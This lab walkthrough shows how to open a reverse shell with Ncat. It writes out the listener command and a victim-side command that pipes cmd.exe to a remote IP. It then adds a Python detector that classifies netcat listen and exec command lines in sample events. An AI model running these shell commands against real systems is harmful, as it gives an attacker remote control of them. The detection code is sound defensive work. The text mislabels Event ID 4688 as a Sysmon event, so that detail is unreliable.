The purpose of this article is to put together a step-by-step guide on how to perform a reverse shell using Ncat, the netcat-style tool that ships with Nmap. This walkthrough is in a controlled lab environment where we have complete control of both machines.
The files referred to above can be found at http://nmap.org/dist/ncat-portable-5.59BETA1.zip. This is a portable edition; only ncat.exe is required.
The diagram illustrates the connectivity between the two machines.
- The actor machine should have the following command running in an administrator command prompt: “ncat -lvp 5000” (see screenshot below).
- The victim machine should have the following command running in the command prompt: “ncat 192.168.254.20 5000 -e cmd.exe”. Note: the IP address 192.168.254.20 is whatever your actor machine's address is (see screenshot below).
Once you have an established connection, the server (actor) side will drop to a prompt and you can issue commands as if you were on the victim machine itself. A good command to test with is hostname, which returns the name of the machine you are on.
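From the defender's side, the two command lines above are exactly what process-creation telemetry should flag. The following Python is an added example, not part of the original walkthrough: it classifies netcat-family command lines by their listen and exec flags and runs over a constructed set of sample events (the pipe-separated event format and all entries are assumptions made for the example).

```python
# Constructed sample process-creation events (not real logs), in an assumed
# "timestamp|host|user|command_line" format.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00|victim01|alice|ncat 192.168.254.20 5000 -e cmd.exe",
    "2024-01-01T10:00:05|actor01|bob|ncat -lvp 5000",
    "2024-01-01T10:01:00|victim01|alice|ncat --exec=cmd.exe 192.168.254.20 5000",
    "2024-01-01T10:02:00|build01|ci|ncat -z 10.0.0.5 443",   # benign port check
    "2024-01-01T10:03:00|victim01|alice|hostname",
]

NETCAT_BINARIES = {"ncat", "ncat.exe", "nc", "nc.exe", "netcat"}


def classify(command_line: str) -> str:
    """Classify a command line as 'reverse_shell', 'bind_shell', 'listener'
    or 'benign' based on netcat's listen (-l/--listen) and exec
    (-e/-c/--exec/--sh-exec/--lua-exec) options, including clustered
    short flags such as -lvp."""
    tokens = command_line.split()
    if not tokens:
        return "benign"
    # Strip a Windows or POSIX path so C:\Tools\ncat.exe still matches.
    binary = tokens[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    if binary not in NETCAT_BINARIES:
        return "benign"
    listen = exec_ = False
    for tok in tokens[1:]:
        name = tok.split("=", 1)[0]          # handles --exec=cmd.exe
        if name.startswith("--"):
            listen |= name == "--listen"
            exec_ |= name in ("--exec", "--sh-exec", "--lua-exec")
        elif name.startswith("-") and len(name) > 1:
            letters = set(name[1:])          # clustered flags: -lvp, -ve ...
            listen |= "l" in letters
            exec_ |= bool(letters & {"e", "c"})
    if exec_:
        return "bind_shell" if listen else "reverse_shell"
    return "listener" if listen else "benign"


def find_suspicious(events):
    """Return one finding per event whose command line is a listening or
    shell-spawning netcat invocation."""
    findings = []
    for line in events:
        ts, host, user, cmd = line.split("|", 3)
        verdict = classify(cmd)
        if verdict != "benign":
            findings.append({"time": ts, "host": host, "user": user,
                             "verdict": verdict, "command": cmd})
    return findings
```

In practice the same logic maps onto Sysmon Event ID 4688/Event ID 1 command-line fields, and an `-e`/`--exec` hit on a non-administrative host is a high-confidence alert rather than a hunt lead.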